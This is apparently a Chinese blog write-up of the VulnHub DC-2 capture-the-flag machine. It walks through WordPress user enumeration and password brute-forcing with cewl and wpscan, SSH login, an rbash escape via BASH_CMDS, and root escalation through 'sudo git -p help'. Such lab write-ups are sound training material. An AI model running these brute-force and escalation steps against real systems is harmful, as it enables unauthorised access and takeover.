Loading... 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ 第一个flag: ![image.png](https://www.irohane.top/usr/uploads/2022/04/4085171094.png) 发现让我用一个身份去登录 ![image.png](https://www.irohane.top/usr/uploads/2022/04/2382468226.png) 修改Host文件把DC重定向这样一些资源也可以显示。 ![image.png](https://www.irohane.top/usr/uploads/2022/04/104046582.png) 这样就容易看了。 那么我们使用Dirb去爆破网站后缀,发现管理员登录页面 ![image.png](https://www.irohane.top/usr/uploads/2022/04/204245269.png) 根据提示使用cewl来创建密码字典 cewl http://dc-2/ -w dict.txt ![image.png](https://www.irohane.top/usr/uploads/2022/04/609491353.png) 虽然我们获取了密码字典,但是我们没有用户字典。那么我们用到wpscan 来扫描网站上的用户信息 `命令:wpscan --url http://dc-2/wp-admin/ -e u` ![image.png](https://www.irohane.top/usr/uploads/2022/04/2445157738.png) `wpscan --url http://dc-2 -U ./user.txt -P ./dict.txt` 找到两个用户 ![image.png](https://www.irohane.top/usr/uploads/2022/04/381929614.png) ``` [!] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient ``` 登录果然登录成功用户存在。 ![image.png](https://www.irohane.top/usr/uploads/2022/04/4157089539.png)我们在页总发现flag2 ![image.png](https://www.irohane.top/usr/uploads/2022/04/657687229.png) 另一个切入点? ![image.png](https://www.irohane.top/usr/uploads/2022/04/2011595999.png) 我上网才找到 ssh是另一个切入点。之前发现的7744 ![image.png](https://www.irohane.top/usr/uploads/2022/04/4089938587.png) 使用TOM的账号登陆了 ![image.png](https://www.irohane.top/usr/uploads/2022/04/3571560681.png) 查看的时候发现没有权限。 ![image.png](https://www.irohane.top/usr/uploads/2022/04/3884362134.png) 那我们就看一下我们目前有什么权限 ``` ls /home/tom/usr/bin ``` 范围很小啊 ![image.png](https://www.irohane.top/usr/uploads/2022/04/2721345196.png) 查看一些命令字符组 echo ${BASH_CMDS[*]} ![image.png](https://www.irohane.top/usr/uploads/2022/04/3916783060.png) `绕过rbash `[推荐文章](https://blog.csdn.net/qq_43168364/article/details/111830233?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162719543816780366532696%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=162719543816780366532696&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_v2~rank_v29-4-111830233.pc_v2_rank_blog_default&utm_term=-rbash&spm=1018.2226.3001.4450 "点击跳转") `BASH_CMDS[a]=/bin/sh;a ` 虽然还是无法使用cat ![image.png](https://www.irohane.top/usr/uploads/2022/04/1897759749.png) 但是可以使用.. 和 cd了 在jerry下发现flag4 ![image.png](https://www.irohane.top/usr/uploads/2022/04/4107340192.png) 就让我们提权嘛。 ![image.png](https://www.irohane.top/usr/uploads/2022/04/4037147427.png) 继续加环境变量 ``` $ export PATH=$PATH:/bin/ $ export PATH=$PATH:/usr/bin ``` ![image.png](https://www.irohane.top/usr/uploads/2022/04/20525951.png) Git提权:`sudo git -p help`记得把窗体拉小。才能输入!/bin/bash ![image.png](https://www.irohane.top/usr/uploads/2022/04/4006965579.png) ![image.png](https://www.irohane.top/usr/uploads/2022/04/1050172060.png) 提权成功,获取最后的flag.txt ![image.png](https://www.irohane.top/usr/uploads/2022/04/2249022637.png) 最后修改:2022 年 04 月 28 日 © 允许规范转载 赞 0 如果觉得我的文章对你有用,请随意赞赏
1 条评论
怎么收藏这篇文章?